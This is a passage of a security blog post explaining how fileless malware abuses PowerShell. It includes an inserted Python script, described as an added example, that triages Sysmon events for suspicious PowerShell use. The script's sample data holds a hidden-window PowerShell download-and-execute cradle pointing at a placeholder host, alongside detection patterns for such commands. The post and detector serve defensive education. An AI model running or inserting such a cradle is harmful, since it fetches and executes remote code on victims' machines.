What would you say if I told you that now a hacker doesn’t even have to trick you into installing malicious files on your computer in order to steal sensitive data? Let’s take a look at how this form of (non-) malware works and, more importantly, how to protect yourself against it.
So how does this fileless malware attack occur?
The big picture involves taking control of legitimate Windows tools like PowerShell and Windows Management Instrumentation (WMI) and then undertaking nefarious activity at the command-line level. The sneaky part is that since PowerShell is such a trusted component of Windows, most security scans don’t check it. Meanwhile, having entered the system by the path of least resistance, the perpetrator can retrieve sensitive data and migrate to other machines on the network at their leisure.
Let’s look at an example of how this might happen.
Step 1: Perhaps at the behest of a clever spam message promising untold riches, a user clicks on a link and visits a website.
Step 2: When Flash player loads, the fix is in.
Step 3: Flash accesses PowerShell, and from here, operating only in the computer’s memory, instructions go through the command line. Those instructions tell it to download a malicious PowerShell script specializing in collecting sensitive data and sending it back to its creator.
And there you go! Never once in the process did the criminal have to figure out how to sneak a malicious program past antivirus and malware defense. This is a big deal.
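The chain in Step 3 still creates a process: PowerShell started by the browser, with download instructions on its command line. The following added example (not from the original post) triages process-creation events for that pattern; the field names follow Sysmon Event ID 1, and the parent list, indicator patterns, threshold and sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumption: programs with no normal reason to start PowerShell. Tune per site.
UNEXPECTED_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "plugin-container.exe"}

# Command-line traits of download-and-run-in-memory use (heuristics, not proof).
INDICATORS = {
    "hidden window": re.compile(r"-w(in(dowstyle)?)?\s+hidden", re.I),
    "encoded command": re.compile(r"\s-e(nc(odedcommand)?)?\s", re.I),
    "network download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "in-memory execution": re.compile(r"\biex\b|invoke-expression", re.I),
}

def exe_name(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()

def findings(event):
    """Return the reasons one process-creation event deserves review."""
    if exe_name(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    parent = exe_name(event["ParentImage"])
    if parent in UNEXPECTED_PARENTS:
        reasons.append(f"spawned by {parent}")
    cmd = event["CommandLine"]
    reasons += [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return reasons

def triage(events, threshold=2):
    """Return (ProcessId, reasons) for events with at least `threshold` reasons."""
    return [(e["ProcessId"], r) for e in events if len(r := findings(e)) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"ProcessId": 4312, "Image": PS,
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object "
                    "Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"},
    {"ProcessId": 5120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": 6644, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -Command Invoke-WebRequest "
                    "https://example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

Only the browser-spawned event crosses the threshold; the scheduled script and the administrator's single download do not, which is the point of requiring more than one reason before raising an alert.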
Why Fileless Malware Now?
The reason sophisticated cyber criminals have shifted their focus away from popular malware strategies like brute force automated login attempts or sneaky spear phishing schemes is simple: traditional antivirus and anti-malware security aren’t even looking where these fileless malware attacks are going. They
This is a Security Bloggers Network syndicated blog post authored by Tripwire Guest Authors. Read the original post at: The State of Security